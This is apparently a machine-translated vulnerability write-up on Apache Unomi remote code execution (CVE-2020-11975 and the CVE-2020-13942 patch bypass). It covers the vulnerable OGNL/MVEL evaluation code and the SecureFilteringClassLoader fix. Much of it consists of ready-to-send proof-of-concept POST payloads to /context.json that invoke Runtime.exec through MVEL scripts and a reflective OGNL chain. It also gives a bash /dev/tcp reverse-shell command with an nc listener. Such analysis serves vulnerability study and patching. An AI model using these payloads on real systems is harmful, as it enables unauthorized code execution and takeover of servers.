---

One 、Apache Unomi brief introduction

Apache Unomi（ Pronunciation is “You know me”） It's a Java Open source customer data platform , One Java The server , Designed to manage customers 、 Lead and visitor data and help personalize the customer experience , It also provides rules that respect the privacy of visitors （ Such as GDPR） The function of .

Two 、CVE-2020-11975 Loophole

stay Apache Unomi<1.5.1 In the version of the , A remote attacker sends a message with MVEL and OGNL expression Request , Causes the remote code to execute , Permissions are Unomi Permission to run the application , The vulnerability number is CVE-2020-11975. and CVE-2020-13942 It's right CVE-2020-11975 Patch bypass .

2.1、CVE-2020-11975 Vulnerability code

Click to see CVE-2020-11975 Vulnerability code address

The following code snippet parses ：PropertyConditionEvaluator class be responsible for conditions( Conditions ) Internal OGNL expression The calculation of / perform .

public class PropertyConditionEvaluator implements ConditionEvaluator {
    
 ...
  protected Object getOGNLPropertyValue(Item item, String expression) throws Exception {
    
        ExpressionAccessor accessor = getPropertyAccessor(item, expression);
        return accessor != null ? accessor.get(getOgnlContext(), item) : null;
    }
 ...

Assemble the above code , We analyze ： When Unomi When receiving the following data ,Unomi How will it be carried out ：

{
    
  "condition":{
    
    "parameterValues":{
    
      "propertyName":"Uname1 Uname2",
      "comparisonOperator":"equals",
      "propertyValue":"male"
      }
  }
}

1、Unomi According to the user input The attribute name (property name), lookup Hard coded attributes (hardcoded properties).
2、 Can't find the , Call getOGNLPropertyValue Method , This method will The attribute name entered by the user (property name) As a OGNL expression , Calculation / Execute this " The attribute name ".
3、 In the calculation / perform OGNL When the expression , ExpressionAccessor Use " Default parameters "(default parameters), This leads to arbitrary OGNL Calculation of expressions / perform .

CVE-2020-11975 OGNL Inject POC as follows ：

POST /context.json HTTP/1.1
Host: localhost:8181
Connection: close
Content-Length: 749

{
    
    "filters": [
        {
    
            "id": "sample",
            "filters": [
                {
    
                    "condition": {
    
                        "parameterValues": {
    
                            "":"script::Runtime r = Runtime.getRuntime(); r.exec(\"ping dnslog\");"
                        },
                        "type":"profilePropertyCondition"
                    }
                }
            ]
        }
    ],
    "sessionId": "sample"
}

2.2、CVE-2020-11975 Vulnerability repair code

change 1：OGNL The process adds SecureFilteringClassLoader
take SecureFilteringClassLoader Add to getOGNLPropertyValue() Methodical OgnlContext in , To prevent calculation / Carry out arbitrary OGNL expression .

public class PropertyConditionEvaluator implements ConditionEvaluator {
    
    ...
    protected Object getOGNLPropertyValue(Item item, String expression) throws Exception {
    
        ClassLoader secureFilteringClassLoader = new SecureFilteringClassLoader(PropertyConditionEvaluator.class.getClassLoader());
        OgnlContext ognlContext = getOgnlContext(secureFilteringClassLoader);
        ExpressionAccessor accessor = getPropertyAccessor(item, expression, ognlContext, secureFilteringClassLoader);
        return accessor != null ? accessor.get(ognlContext, item) : null;
    }
    ...

change 2：MVEL The process adds SecureFilteringClassLoader
take SecureFilteringClassLoader Add to getOGNLPropertyValue() Methodical OgnlContext in , To prevent calculation / Carry out arbitrary OGNL expression .

public class ConditionContextHelper {
     
...  
    private static Object executeScript(Map<String, Object> context, String script) {
    
        final ClassLoader tccl = Thread.currentThread().getContextClassLoader();
        try {
    
            if (!mvelExpressions.containsKey(script)) {
    
                ClassLoader secureFilteringClassLoader = new SecureFilteringClassLoader(ConditionContextHelper.class.getClassLoader());
                Thread.currentThread().setContextClassLoader(secureFilteringClassLoader);
                ParserConfiguration parserConfiguration = new ParserConfiguration();
                parserConfiguration.setClassLoader(secureFilteringClassLoader);
                mvelExpressions.put(script, MVEL.compileExpression(script, new ParserContext(parserConfiguration)));
            }
            return MVEL.executeExpression(mvelExpressions.get(script), context);
            ...

change 3： Introduced SecureFilteringClassLoader– Safely filtered ClassLoader
SecureFilteringClassLoader Class overridden ClassLoader Class loadClass() Method , stay Predefined collections (predefined set) It clearly limits Accessible classes (accessible classes) , And according to allowlist and blocklist To check the class used in the expression ：
If it's a match blocklist, Throw an exception ;
If it doesn't match allowlist, Throw an exception ;
To limit the calculation / Carry out arbitrary MVEL and OGNL expression .

@Override
    public Class<?> loadClass(String name) throws ClassNotFoundException {
    
        if (forbiddenClasses != null && classNameMatches(forbiddenClasses, name)) {
    
            throw new ClassNotFoundException("Access to class " + name + " not allowed");
        }
        if (allowedClasses != null && !classNameMatches(allowedClasses, name)) {
    
            throw new ClassNotFoundException("Access to class " + name + " not allowed");
        }
        return delegate.loadClass(name);
    }

3、 ... and 、CVE-2020-13942 Loophole

CVE-2020-11975 Mainly through the introduction of SecureFilteringClassLoader function , rewrite ClassLoder Class loadClass() Method , Filter out the classes used in the expression through the black-and-white list , In order to defend .
however MVEL Expressions can be used directly Instantiated classes （ example Runtime or System）, No transfer loadClass(), To bypass SecureFilteringClassLoader.

Repeat step ：

3.1、 perform MVEL expression

visit IP:8181 The packet capture change request is ：POST /context.json
Content-Type by ：application/json
perform curl Monitor IP:port

The listener executes nc -lvvp 6666

POC See below ：

{
    
    "filters": [
        {
    
            "id": "sample",
            "filters": [
                {
    
                    "condition": {
    
                         "parameterValues": {
    
                            "": "script::Runtime r = Runtime.getRuntime(); r.exec(\"command\");"
                        },
                        "type": "profilePropertyCondition"
                    }
                }
            ]
        }
    ],
    "sessionId": "sample"
}

3.2、 perform OGNL expression

visit IP:8181 The packet capture change request is ：POST /context.json
Content-Type by ：application/json
perform curl Monitor IP:port

The listener executes nc -lvvp 6666

POC See below ：

{
    
  "personalizations":[
    {
    
      "id":"gender-test",
     "strategy":"matching-first",
      "strategyOptions":{
    
        "fallback":"var2"
      },
      "contents":[
        {
    
          "filters":[
            {
    
              "condition":{
    
                "parameterValues":{
    
                 "propertyName":"(#runtimeclass =#this.getClass().forName(\"java.lang.Runtime\")).(#getruntimemethod =#runtimeclass.getDeclaredMethods().{^ #this.name.equals(\"getRuntime\")}[0]).(#rtobj= #getruntimemethod.invoke(null,null)).(#execmethod =#runtimeclass.getDeclaredMethods().{? #this.name.equals(\"exec\")}.{?#this.getParameters()[0].getType().getName().equals(\"java.lang.String\")}.{?#this.getParameters().length < 2}[0]).(#execmethod.invoke(#rtobj,\"command\"))",
                  "comparisonOperator":"equals",
                 "propertyValue":"male"
                },
               "type":"profilePropertyCondition"
              }
            }
          ]
        }
      ]
    }
  ],
  "sessionId":"sample"
}

3.3、 rebound shell

visit IP:8181 The packet capture change request is ：POST /context.json
Content-Type by ：application/json
perform bash -i >& /dev/tcp/10.211.55.3/6666 0>&1, Need to carry out base64 encryption .

The listener executes nc -lvvp 6666

---

Reference resources ： https://github.com/apache/unomi/blob/206b646eb5cfa1e341ca7170705721de9b5b9716/persistence-elasticsearch/core/src/main/java/org/apache/unomi/persistence/elasticsearch/conditions/ConditionContextHelper.java#L81-L89 https://github.com/apache/unomi/commit/823386ab117d231df15eab4cb4b7a98f8af546ca

https://github.com/wofeiwo/webcgi-exploits/blob/master/python/uwsgi-rce-zh.md